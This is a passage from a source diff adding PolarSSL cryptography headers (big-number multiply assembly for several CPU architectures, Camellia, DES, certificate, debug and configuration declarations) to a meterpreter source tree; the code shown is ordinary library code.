"r3", "r4", "r5", "r6", "r7", "r8", "r9" );
#endif
#else /* PPC32 */
#if defined(__MACH__) && defined(__APPLE__)
#define MULADDC_INIT \
asm( "lwz r3, %0 " :: "m" (s)); \
asm( "lwz r4, %0 " :: "m" (d)); \
asm( "lwz r5, %0 " :: "m" (c)); \
asm( "lwz r6, %0 " :: "m" (b)); \
asm( "addi r3, r3, -4 " ); \
asm( "addi r4, r4, -4 " ); \
asm( "addic r5, r5, 0 " );
#define MULADDC_CORE \
asm( "lwzu r7, 4(r3) " ); \
asm( "mullw r8, r7, r6 " ); \
asm( "mulhwu r9, r7, r6 " ); \
asm( "adde r8, r8, r5 " ); \
asm( "lwz r7, 4(r4) " ); \
asm( "addze r5, r9 " ); \
asm( "addc r8, r8, r7 " ); \
asm( "stwu r8, 4(r4) " );
#define MULADDC_STOP \
asm( "addze r5, r5 " ); \
asm( "addi r4, r4, 4 " ); \
asm( "addi r3, r3, 4 " ); \
asm( "stw r5, %0 " : "=m" (c)); \
asm( "stw r4, %0 " : "=m" (d)); \
asm( "stw r3, %0 " : "=m" (s) :: \
"r3", "r4", "r5", "r6", "r7", "r8", "r9" );
#else
#define MULADDC_INIT \
asm( "lwz %%r3, %0 " :: "m" (s)); \
asm( "lwz %%r4, %0 " :: "m" (d)); \
asm( "lwz %%r5, %0 " :: "m" (c)); \
asm( "lwz %%r6, %0 " :: "m" (b)); \
asm( "addi %r3, %r3, -4 " ); \
asm( "addi %r4, %r4, -4 " ); \
asm( "addic %r5, %r5, 0 " );
#define MULADDC_CORE \
asm( "lwzu %r7, 4(%r3) " ); \
asm( "mullw %r8, %r7, %r6 " ); \
asm( "mulhwu %r9, %r7, %r6 " ); \
asm( "adde %r8, %r8, %r5 " ); \
asm( "lwz %r7, 4(%r4) " ); \
asm( "addze %r5, %r9 " ); \
asm( "addc %r8, %r8, %r7 " ); \
asm( "stwu %r8, 4(%r4) " );
#define MULADDC_STOP \
asm( "addze %r5, %r5 " ); \
asm( "addi %r4, %r4, 4 " ); \
asm( "addi %r3, %r3, 4 " ); \
asm( "stw %%r5, %0 " : "=m" (c)); \
asm( "stw %%r4, %0 " : "=m" (d)); \
asm( "stw %%r3, %0 " : "=m" (s) :: \
"r3", "r4", "r5", "r6", "r7", "r8", "r9" );
#endif
#endif /* PPC32 */
#endif /* PPC64 */
#if defined(__sparc__)
#define MULADDC_INIT \
asm( "ld %0, %%o0 " :: "m" (s)); \
asm( "ld %0, %%o1 " :: "m" (d)); \
asm( "ld %0, %%o2 " :: "m" (c)); \
asm( "ld %0, %%o3 " :: "m" (b));
#define MULADDC_CORE \
asm( "ld [%o0], %o4 " ); \
asm( "inc 4, %o0 " ); \
asm( "ld [%o1], %o5 " ); \
asm( "umul %o3, %o4, %o4 " ); \
asm( "addcc %o4, %o2, %o4 " ); \
asm( "rd %y, %g1 " ); \
asm( "addx %g1, 0, %g1 " ); \
asm( "addcc %o4, %o5, %o4 " ); \
asm( "st %o4, [%o1] " ); \
asm( "addx %g1, 0, %o2 " ); \
asm( "inc 4, %o1 " );
#define MULADDC_STOP \
asm( "st %%o2, %0 " : "=m" (c)); \
asm( "st %%o1, %0 " : "=m" (d)); \
asm( "st %%o0, %0 " : "=m" (s) :: \
"g1", "o0", "o1", "o2", "o3", "o4", "o5" );
#endif /* SPARCv8 */
#if defined(__microblaze__) || defined(microblaze)
#define MULADDC_INIT \
asm( "lwi r3, %0 " :: "m" (s)); \
asm( "lwi r4, %0 " :: "m" (d)); \
asm( "lwi r5, %0 " :: "m" (c)); \
asm( "lwi r6, %0 " :: "m" (b)); \
asm( "andi r7, r6, 0xffff" ); \
asm( "bsrli r6, r6, 16 " );
#define MULADDC_CORE \
asm( "lhui r8, r3, 0 " ); \
asm( "addi r3, r3, 2 " ); \
asm( "lhui r9, r3, 0 " ); \
asm( "addi r3, r3, 2 " ); \
asm( "mul r10, r9, r6 " ); \
asm( "mul r11, r8, r7 " ); \
asm( "mul r12, r9, r7 " ); \
asm( "mul r13, r8, r6 " ); \
asm( "bsrli r8, r10, 16 " ); \
asm( "bsrli r9, r11, 16 " ); \
asm( "add r13, r13, r8 " ); \
asm( "add r13, r13, r9 " ); \
asm( "bslli r10, r10, 16 " ); \
asm( "bslli r11, r11, 16 " ); \
asm( "add r12, r12, r10 " ); \
asm( "addc r13, r13, r0 " ); \
asm( "add r12, r12, r11 " ); \
asm( "addc r13, r13, r0 " ); \
asm( "lwi r10, r4, 0 " ); \
asm( "add r12, r12, r10 " ); \
asm( "addc r13, r13, r0 " ); \
asm( "add r12, r12, r5 " ); \
asm( "addc r5, r13, r0 " ); \
asm( "swi r12, r4, 0 " ); \
asm( "addi r4, r4, 4 " );
#define MULADDC_STOP \
asm( "swi r5, %0 " : "=m" (c)); \
asm( "swi r4, %0 " : "=m" (d)); \
asm( "swi r3, %0 " : "=m" (s) :: \
"r3", "r4" , "r5" , "r6" , "r7" , "r8" , \
"r9", "r10", "r11", "r12", "r13" );
#endif /* MicroBlaze */
#if defined(__tricore__)
#define MULADDC_INIT \
asm( "ld.a %%a2, %0 " :: "m" (s)); \
asm( "ld.a %%a3, %0 " :: "m" (d)); \
asm( "ld.w %%d4, %0 " :: "m" (c)); \
asm( "ld.w %%d1, %0 " :: "m" (b)); \
asm( "xor %d5, %d5 " );
#define MULADDC_CORE \
asm( "ld.w %d0, [%a2+] " ); \
asm( "madd.u %e2, %e4, %d0, %d1 " ); \
asm( "ld.w %d0, [%a3] " ); \
asm( "addx %d2, %d2, %d0 " ); \
asm( "addc %d3, %d3, 0 " ); \
asm( "mov %d4, %d3 " ); \
asm( "st.w [%a3+], %d2 " );
#define MULADDC_STOP \
asm( "st.w %0, %%d4 " : "=m" (c)); \
asm( "st.a %0, %%a3 " : "=m" (d)); \
asm( "st.a %0, %%a2 " : "=m" (s) :: \
"d0", "d1", "e2", "d4", "a2", "a3" );
#endif /* TriCore */
#if defined(__arm__)
#define MULADDC_INIT \
asm( "ldr r0, %0 " :: "m" (s)); \
asm( "ldr r1, %0 " :: "m" (d)); \
asm( "ldr r2, %0 " :: "m" (c)); \
asm( "ldr r3, %0 " :: "m" (b));
#define MULADDC_CORE \
asm( "ldr r4, [r0], #4 " ); \
asm( "mov r5, #0 " ); \
asm( "ldr r6, [r1] " ); \
asm( "umlal r2, r5, r3, r4 " ); \
asm( "adds r7, r6, r2 " ); \
asm( "adc r2, r5, #0 " ); \
asm( "str r7, [r1], #4 " );
#define MULADDC_STOP \
asm( "str r2, %0 " : "=m" (c)); \
asm( "str r1, %0 " : "=m" (d)); \
asm( "str r0, %0 " : "=m" (s) :: \
"r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7" );
#endif /* ARMv3 */
#if defined(__alpha__)
#define MULADDC_INIT \
asm( "ldq $1, %0 " :: "m" (s)); \
asm( "ldq $2, %0 " :: "m" (d)); \
asm( "ldq $3, %0 " :: "m" (c)); \
asm( "ldq $4, %0 " :: "m" (b));
#define MULADDC_CORE \
asm( "ldq $6, 0($1) " ); \
asm( "addq $1, 8, $1 " ); \
asm( "mulq $6, $4, $7 " ); \
asm( "umulh $6, $4, $6 " ); \
asm( "addq $7, $3, $7 " ); \
asm( "cmpult $7, $3, $3 " ); \
asm( "ldq $5, 0($2) " ); \
asm( "addq $7, $5, $7 " ); \
asm( "cmpult $7, $5, $5 " ); \
asm( "stq $7, 0($2) " ); \
asm( "addq $2, 8, $2 " ); \
asm( "addq $6, $3, $3 " ); \
asm( "addq $5, $3, $3 " );
#define MULADDC_STOP \
asm( "stq $3, %0 " : "=m" (c)); \
asm( "stq $2, %0 " : "=m" (d)); \
asm( "stq $1, %0 " : "=m" (s) :: \
"$1", "$2", "$3", "$4", "$5", "$6", "$7" );
#endif /* Alpha */
#if defined(__mips__)
#define MULADDC_INIT \
asm( "lw $10, %0 " :: "m" (s)); \
asm( "lw $11, %0 " :: "m" (d)); \
asm( "lw $12, %0 " :: "m" (c)); \
asm( "lw $13, %0 " :: "m" (b));
#define MULADDC_CORE \
asm( "lw $14, 0($10) " ); \
asm( "multu $13, $14 " ); \
asm( "addi $10, $10, 4 " ); \
asm( "mflo $14 " ); \
asm( "mfhi $9 " ); \
asm( "addu $14, $12, $14 " ); \
asm( "lw $15, 0($11) " ); \
asm( "sltu $12, $14, $12 " ); \
asm( "addu $15, $14, $15 " ); \
asm( "sltu $14, $15, $14 " ); \
asm( "addu $12, $12, $9 " ); \
asm( "sw $15, 0($11) " ); \
asm( "addu $12, $12, $14 " ); \
asm( "addi $11, $11, 4 " );
#define MULADDC_STOP \
asm( "sw $12, %0 " : "=m" (c)); \
asm( "sw $11, %0 " : "=m" (d)); \
asm( "sw $10, %0 " : "=m" (s) :: \
"$9", "$10", "$11", "$12", "$13", "$14", "$15" );
#endif /* MIPS */
#endif /* GNUC */
#if (defined(_MSC_VER) && defined(_M_IX86)) || defined(__WATCOMC__)
#define MULADDC_INIT \
__asm mov esi, s \
__asm mov edi, d \
__asm mov ecx, c \
__asm mov ebx, b
#define MULADDC_CORE \
__asm lodsd \
__asm mul ebx \
__asm add eax, ecx \
__asm adc edx, 0 \
__asm add eax, [edi] \
__asm adc edx, 0 \
__asm mov ecx, edx \
__asm stosd
#if defined(POLARSSL_HAVE_SSE2)
#define EMIT __asm _emit
#define MULADDC_HUIT \
EMIT 0x0F EMIT 0x6E EMIT 0xC9 \
EMIT 0x0F EMIT 0x6E EMIT 0xC3 \
EMIT 0x0F EMIT 0x6E EMIT 0x1F \
EMIT 0x0F EMIT 0xD4 EMIT 0xCB \
EMIT 0x0F EMIT 0x6E EMIT 0x16 \
EMIT 0x0F EMIT 0xF4 EMIT 0xD0 \
EMIT 0x0F EMIT 0x6E EMIT 0x66 EMIT 0x04 \
EMIT 0x0F EMIT 0xF4 EMIT 0xE0 \
EMIT 0x0F EMIT 0x6E EMIT 0x76 EMIT 0x08 \
EMIT 0x0F EMIT 0xF4 EMIT 0xF0 \
EMIT 0x0F EMIT 0x6E EMIT 0x7E EMIT 0x0C \
EMIT 0x0F EMIT 0xF4 EMIT 0xF8 \
EMIT 0x0F EMIT 0xD4 EMIT 0xCA \
EMIT 0x0F EMIT 0x6E EMIT 0x5F EMIT 0x04 \
EMIT 0x0F EMIT 0xD4 EMIT 0xDC \
EMIT 0x0F EMIT 0x6E EMIT 0x6F EMIT 0x08 \
EMIT 0x0F EMIT 0xD4 EMIT 0xEE \
EMIT 0x0F EMIT 0x6E EMIT 0x67 EMIT 0x0C \
EMIT 0x0F EMIT 0xD4 EMIT 0xFC \
EMIT 0x0F EMIT 0x7E EMIT 0x0F \
EMIT 0x0F EMIT 0x6E EMIT 0x56 EMIT 0x10 \
EMIT 0x0F EMIT 0xF4 EMIT 0xD0 \
EMIT 0x0F EMIT 0x73 EMIT 0xD1 EMIT 0x20 \
EMIT 0x0F EMIT 0x6E EMIT 0x66 EMIT 0x14 \
EMIT 0x0F EMIT 0xF4 EMIT 0xE0 \
EMIT 0x0F EMIT 0xD4 EMIT 0xCB \
EMIT 0x0F EMIT 0x6E EMIT 0x76 EMIT 0x18 \
EMIT 0x0F EMIT 0xF4 EMIT 0xF0 \
EMIT 0x0F EMIT 0x7E EMIT 0x4F EMIT 0x04 \
EMIT 0x0F EMIT 0x73 EMIT 0xD1 EMIT 0x20 \
EMIT 0x0F EMIT 0x6E EMIT 0x5E EMIT 0x1C \
EMIT 0x0F EMIT 0xF4 EMIT 0xD8 \
EMIT 0x0F EMIT 0xD4 EMIT 0xCD \
EMIT 0x0F EMIT 0x6E EMIT 0x6F EMIT 0x10 \
EMIT 0x0F EMIT 0xD4 EMIT 0xD5 \
EMIT 0x0F EMIT 0x7E EMIT 0x4F EMIT 0x08 \
EMIT 0x0F EMIT 0x73 EMIT 0xD1 EMIT 0x20 \
EMIT 0x0F EMIT 0xD4 EMIT 0xCF \
EMIT 0x0F EMIT 0x6E EMIT 0x6F EMIT 0x14 \
EMIT 0x0F EMIT 0xD4 EMIT 0xE5 \
EMIT 0x0F EMIT 0x7E EMIT 0x4F EMIT 0x0C \
EMIT 0x0F EMIT 0x73 EMIT 0xD1 EMIT 0x20 \
EMIT 0x0F EMIT 0xD4 EMIT 0xCA \
EMIT 0x0F EMIT 0x6E EMIT 0x6F EMIT 0x18 \
EMIT 0x0F EMIT 0xD4 EMIT 0xF5 \
EMIT 0x0F EMIT 0x7E EMIT 0x4F EMIT 0x10 \
EMIT 0x0F EMIT 0x73 EMIT 0xD1 EMIT 0x20 \
EMIT 0x0F EMIT 0xD4 EMIT 0xCC \
EMIT 0x0F EMIT 0x6E EMIT 0x6F EMIT 0x1C \
EMIT 0x0F EMIT 0xD4 EMIT 0xDD \
EMIT 0x0F EMIT 0x7E EMIT 0x4F EMIT 0x14 \
EMIT 0x0F EMIT 0x73 EMIT 0xD1 EMIT 0x20 \
EMIT 0x0F EMIT 0xD4 EMIT 0xCE \
EMIT 0x0F EMIT 0x7E EMIT 0x4F EMIT 0x18 \
EMIT 0x0F EMIT 0x73 EMIT 0xD1 EMIT 0x20 \
EMIT 0x0F EMIT 0xD4 EMIT 0xCB \
EMIT 0x0F EMIT 0x7E EMIT 0x4F EMIT 0x1C \
EMIT 0x83 EMIT 0xC7 EMIT 0x20 \
EMIT 0x83 EMIT 0xC6 EMIT 0x20 \
EMIT 0x0F EMIT 0x73 EMIT 0xD1 EMIT 0x20 \
EMIT 0x0F EMIT 0x7E EMIT 0xC9
#define MULADDC_STOP \
EMIT 0x0F EMIT 0x77 \
__asm mov c, ecx \
__asm mov d, edi \
__asm mov s, esi \
#else
#define MULADDC_STOP \
__asm mov c, ecx \
__asm mov d, edi \
__asm mov s, esi \
#endif /* SSE2 */
#endif /* MSVC */
#endif /* POLARSSL_HAVE_ASM */
#if !defined(MULADDC_CORE)
#if defined(POLARSSL_HAVE_LONGLONG)
#define MULADDC_INIT \
{ \
t_dbl r; \
t_int r0, r1;
#define MULADDC_CORE \
r = *(s++) * (t_dbl) b; \
r0 = r; \
r1 = r >> biL; \
r0 += c; r1 += (r0 < c); \
r0 += *d; r1 += (r0 < *d); \
c = r1; *(d++) = r0;
#define MULADDC_STOP \
}
#else
#define MULADDC_INIT \
{ \
t_int s0, s1, b0, b1; \
t_int r0, r1, rx, ry; \
b0 = ( b << biH ) >> biH; \
b1 = ( b >> biH );
#define MULADDC_CORE \
s0 = ( *s << biH ) >> biH; \
s1 = ( *s >> biH ); s++; \
rx = s0 * b1; r0 = s0 * b0; \
ry = s1 * b0; r1 = s1 * b1; \
r1 += ( rx >> biH ); \
r1 += ( ry >> biH ); \
rx <<= biH; ry <<= biH; \
r0 += rx; r1 += (r0 < rx); \
r0 += ry; r1 += (r0 < ry); \
r0 += c; r1 += (r0 < c); \
r0 += *d; r1 += (r0 < *d); \
c = r1; *(d++) = r0;
#define MULADDC_STOP \
}
#endif /* C (generic) */
#endif /* C (longlong) */
#endif /* bn_mul.h */

122
c/meterpreter/source/common/polarssl/camellia.h Normal file

@ -0,0 +1,122 @@
/**
* \file camellia.h
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_CAMELLIA_H
#define POLARSSL_CAMELLIA_H
#include <inttypes.h>
#define CAMELLIA_ENCRYPT 1
#define CAMELLIA_DECRYPT 0
/**
* \brief CAMELLIA context structure
*/
typedef struct
{
int nr; /*!< number of rounds */
uint32_t rk[68]; /*!< CAMELLIA round keys */
}
camellia_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief CAMELLIA key schedule (encryption)
*
* \param ctx CAMELLIA context to be initialized
* \param key encryption key
* \param keysize must be 128, 192 or 256
*/
void camellia_setkey_enc( camellia_context *ctx, unsigned char *key, int keysize );
/**
* \brief CAMELLIA key schedule (decryption)
*
* \param ctx CAMELLIA context to be initialized
* \param key decryption key
* \param keysize must be 128, 192 or 256
*/
void camellia_setkey_dec( camellia_context *ctx, unsigned char *key, int keysize );
/**
* \brief CAMELLIA-ECB block encryption/decryption
*
* \param ctx CAMELLIA context
* \param mode CAMELLIA_ENCRYPT or CAMELLIA_DECRYPT
* \param input 16-byte input block
* \param output 16-byte output block
*/
void camellia_crypt_ecb( camellia_context *ctx,
int mode,
unsigned char input[16],
unsigned char output[16] );
/**
* \brief CAMELLIA-CBC buffer encryption/decryption
* Length should be a multiple of the block
* size (16 bytes)
*
* \param ctx CAMELLIA context
* \param mode CAMELLIA_ENCRYPT or CAMELLIA_DECRYPT
* \param length length of the input data
* \param iv initialization vector (updated after use)
* \param input buffer holding the input data
* \param output buffer holding the output data
*/
void camellia_crypt_cbc( camellia_context *ctx,
int mode,
int length,
unsigned char iv[16],
unsigned char *input,
unsigned char *output );
/**
* \brief CAMELLIA-CFB128 buffer encryption/decryption
*
* \param ctx CAMELLIA context
* \param mode CAMELLIA_ENCRYPT or CAMELLIA_DECRYPT
* \param length length of the input data
* \param iv_off offset in IV (updated after use)
* \param iv initialization vector (updated after use)
* \param input buffer holding the input data
* \param output buffer holding the output data
*/
void camellia_crypt_cfb128( camellia_context *ctx,
int mode,
int length,
int *iv_off,
unsigned char iv[16],
unsigned char *input,
unsigned char *output );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int camellia_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* camellia.h */

42
c/meterpreter/source/common/polarssl/certs.h Normal file

@ -0,0 +1,42 @@
/**
* \file certs.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_CERTS_H
#define POLARSSL_CERTS_H
#ifdef __cplusplus
extern "C" {
#endif
extern char test_ca_crt[];
extern char test_ca_key[];
extern char test_ca_pwd[];
extern char test_srv_crt[];
extern char test_srv_key[];
extern char test_cli_crt[];
extern char test_cli_key[];
extern char xyssl_ca_crt[];
#ifdef __cplusplus
}
#endif
#endif /* certs.h */

324
c/meterpreter/source/common/polarssl/config.h Normal file

@ -0,0 +1,324 @@
/**
* \file config.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
* This set of compile-time options may be used to enable
* or disable features selectively, and reduce the global
* memory footprint.
*/
#ifndef POLARSSL_CONFIG_H
#define POLARSSL_CONFIG_H
#ifndef _CRT_SECURE_NO_DEPRECATE
#define _CRT_SECURE_NO_DEPRECATE 1
#endif
/*
* Uncomment if native integers are 8-bit wide.
*
#define POLARSSL_HAVE_INT8
*/
/*
* Uncomment if native integers are 16-bit wide.
*
#define POLARSSL_HAVE_INT16
*/
/*
* Uncomment if the compiler supports long long.
*
#define POLARSSL_HAVE_LONGLONG
*/
/*
* Uncomment to enable the use of assembly code.
*
* Requires support for asm() in compiler.
*
* Used in:
* library/timing.c
* library/padlock.c
* include/polarssl/bn_mul.h
*
*/
#define POLARSSL_HAVE_ASM
/*
* Uncomment if the CPU supports SSE2 (IA-32 specific).
*
#define POLARSSL_HAVE_SSE2
*/
/*
* Enable all SSL/TLS debugging messages.
*/
#define POLARSSL_DEBUG_MSG
/*
* Enable the checkup functions (*_self_test).
*/
#define POLARSSL_SELF_TEST
/*
* Enable the prime-number generation code.
*/
#define POLARSSL_GENPRIME
/*
* Uncomment this macro to store the AES tables in ROM.
*
#define POLARSSL_AES_ROM_TABLES
*/
/*
* Module: library/aes.c
* Caller: library/ssl_tls.c
*
* This module enables the following ciphersuites:
* SSL_RSA_AES_128_SHA
* SSL_RSA_AES_256_SHA
* SSL_EDH_RSA_AES_256_SHA
*/
#define POLARSSL_AES_C
/*
* Module: library/arc4.c
* Caller: library/ssl_tls.c
*
* This module enables the following ciphersuites:
* SSL_RSA_RC4_128_MD5
* SSL_RSA_RC4_128_SHA
*/
#define POLARSSL_ARC4_C
/*
* Module: library/base64.c
* Caller: library/x509parse.c
*
* This module is required for X.509 support.
*/
#define POLARSSL_BASE64_C
/*
* Module: library/bignum.c
* Caller: library/dhm.c
* library/rsa.c
* library/ssl_tls.c
* library/x509parse.c
*
* This module is required for RSA and DHM support.
*/
#define POLARSSL_BIGNUM_C
/*
* Module: library/camellia.c
* Caller:
*
* This module enabled the following cipher suites:
*/
#define POLARSSL_CAMELLIA_C
/*
* Module: library/certs.c
* Caller:
*
* This module is used for testing (ssl_client/server).
*/
#define POLARSSL_CERTS_C
/*
* Module: library/debug.c
* Caller: library/ssl_cli.c
* library/ssl_srv.c
* library/ssl_tls.c
*
* This module provides debugging functions.
*/
#define POLARSSL_DEBUG_C
/*
* Module: library/des.c
* Caller: library/ssl_tls.c
*
* This module enables the following ciphersuites:
* SSL_RSA_DES_168_SHA
* SSL_EDH_RSA_DES_168_SHA
*/
#define POLARSSL_DES_C
/*
* Module: library/dhm.c
* Caller: library/ssl_cli.c
* library/ssl_srv.c
*
* This module enables the following ciphersuites:
* SSL_EDH_RSA_DES_168_SHA
* SSL_EDH_RSA_AES_256_SHA
*/
#define POLARSSL_DHM_C
/*
* Module: library/havege.c
* Caller:
*
* This module enables the HAVEGE random number generator.
*/
#define POLARSSL_HAVEGE_C
/*
* Module: library/md2.c
* Caller: library/x509parse.c
*
* Uncomment to enable support for (rare) MD2-signed X.509 certs.
*
#define POLARSSL_MD2_C
*/
/*
* Module: library/md4.c
* Caller: library/x509parse.c
*
* Uncomment to enable support for (rare) MD4-signed X.509 certs.
*
#define POLARSSL_MD4_C
*/
/*
* Module: library/md5.c
* Caller: library/ssl_tls.c
* library/x509parse.c
*
* This module is required for SSL/TLS and X.509.
*/
#define POLARSSL_MD5_C
/*
* Module: library/net.c
* Caller:
*
* This module provides TCP/IP networking routines.
*/
#define POLARSSL_NET_C
/*
* Module: library/padlock.c
* Caller: library/aes.c
*
* This modules adds support for the VIA PadLock on x86.
*/
#define POLARSSL_PADLOCK_C
/*
* Module: library/rsa.c
* Caller: library/ssl_cli.c
* library/ssl_srv.c
* library/ssl_tls.c
* library/x509.c
*
* This module is required for SSL/TLS and MD5-signed certificates.
*/
#define POLARSSL_RSA_C
/*
* Module: library/sha1.c
* Caller: library/ssl_cli.c
* library/ssl_srv.c
* library/ssl_tls.c
* library/x509parse.c
*
* This module is required for SSL/TLS and SHA1-signed certificates.
*/
#define POLARSSL_SHA1_C
/*
* Module: library/sha2.c
* Caller:
*
* This module adds support for SHA-224 and SHA-256.
*/
#define POLARSSL_SHA2_C
/*
* Module: library/sha4.c
* Caller:
*
* This module adds support for SHA-384 and SHA-512.
*/
#define POLARSSL_SHA4_C
/*
* Module: library/ssl_cli.c
* Caller:
*
* This module is required for SSL/TLS client support.
*/
#define POLARSSL_SSL_CLI_C
/*
* Module: library/ssl_srv.c
* Caller:
*
* This module is required for SSL/TLS server support.
*/
#define POLARSSL_SSL_SRV_C
/*
* Module: library/ssl_tls.c
* Caller: library/ssl_cli.c
* library/ssl_srv.c
*
* This module is required for SSL/TLS.
*/
#define POLARSSL_SSL_TLS_C
/*
* Module: library/timing.c
* Caller: library/havege.c
*
* This module is used by the HAVEGE random number generator.
*/
#define POLARSSL_TIMING_C
/*
* Module: library/x509parse.c
* Caller: library/ssl_cli.c
* library/ssl_srv.c
* library/ssl_tls.c
*
* This module is required for X.509 certificate parsing.
*/
#define POLARSSL_X509_PARSE_C
/*
* Module: library/x509_write.c
* Caller:
*
* This module is required for X.509 certificate writing.
*/
#define POLARSSL_X509_WRITE_C
/*
* Module: library/xtea.c
* Caller:
*/
#define POLARSSL_XTEA_C
#endif /* config.h */

81
c/meterpreter/source/common/polarssl/debug.h Normal file

@ -0,0 +1,81 @@
/**
* \file debug.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef SSL_DEBUG_H
#define SSL_DEBUG_H
#include "polarssl/config.h"
#include "polarssl/ssl.h"
#if defined(POLARSSL_DEBUG_MSG)
#define SSL_DEBUG_MSG( level, args ) \
debug_print_msg( ssl, level, __FILE__, __LINE__, debug_fmt args );
#define SSL_DEBUG_RET( level, text, ret ) \
debug_print_ret( ssl, level, __FILE__, __LINE__, text, ret );
#define SSL_DEBUG_BUF( level, text, buf, len ) \
debug_print_buf( ssl, level, __FILE__, __LINE__, text, buf, len );
#define SSL_DEBUG_MPI( level, text, X ) \
debug_print_mpi( ssl, level, __FILE__, __LINE__, text, X );
#define SSL_DEBUG_CRT( level, text, crt ) \
debug_print_crt( ssl, level, __FILE__, __LINE__, text, crt );
#else
#define SSL_DEBUG_MSG( level, args ) do { } while( 0 )
#define SSL_DEBUG_RET( level, text, ret ) do { } while( 0 )
#define SSL_DEBUG_BUF( level, text, buf, len ) do { } while( 0 )
#define SSL_DEBUG_MPI( level, text, X ) do { } while( 0 )
#define SSL_DEBUG_CRT( level, text, crt ) do { } while( 0 )
#endif
#ifdef __cplusplus
extern "C" {
#endif
char *debug_fmt( const char *format, ... );
void debug_print_msg( ssl_context *ssl, int level,
char *file, int line, char *text );
void debug_print_ret( ssl_context *ssl, int level,
char *file, int line, char *text, int ret );
void debug_print_buf( ssl_context *ssl, int level,
char *file, int line, char *text,
unsigned char *buf, int len );
void debug_print_mpi( ssl_context *ssl, int level,
char *file, int line, char *text, mpi *X );
void debug_print_crt( ssl_context *ssl, int level,
char *file, int line, char *text, x509_cert *crt );
#ifdef __cplusplus
}
#endif
#endif /* debug.h */

167
c/meterpreter/source/common/polarssl/des.h Normal file

@ -0,0 +1,167 @@
/**
* \file des.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_DES_H
#define POLARSSL_DES_H
#define DES_ENCRYPT 1
#define DES_DECRYPT 0
/**
* \brief DES context structure
*/
typedef struct
{
int mode; /*!< encrypt/decrypt */
unsigned long sk[32]; /*!< DES subkeys */
}
des_context;
/**
* \brief Triple-DES context structure
*/
typedef struct
{
int mode; /*!< encrypt/decrypt */
unsigned long sk[96]; /*!< 3DES subkeys */
}
des3_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief DES key schedule (56-bit, encryption)
*
* \param ctx DES context to be initialized
* \param key 8-byte secret key
*/
void des_setkey_enc( des_context *ctx, unsigned char key[8] );
/**
* \brief DES key schedule (56-bit, decryption)
*
* \param ctx DES context to be initialized
* \param key 8-byte secret key
*/
void des_setkey_dec( des_context *ctx, unsigned char key[8] );
/**
* \brief Triple-DES key schedule (112-bit, encryption)
*
* \param ctx 3DES context to be initialized
* \param key 16-byte secret key
*/
void des3_set2key_enc( des3_context *ctx, unsigned char key[16] );
/**
* \brief Triple-DES key schedule (112-bit, decryption)
*
* \param ctx 3DES context to be initialized
* \param key 16-byte secret key
*/
void des3_set2key_dec( des3_context *ctx, unsigned char key[16] );
/**
* \brief Triple-DES key schedule (168-bit, encryption)
*
* \param ctx 3DES context to be initialized
* \param key 24-byte secret key
*/
void des3_set3key_enc( des3_context *ctx, unsigned char key[24] );
/**
* \brief Triple-DES key schedule (168-bit, decryption)
*
* \param ctx 3DES context to be initialized
* \param key 24-byte secret key
*/
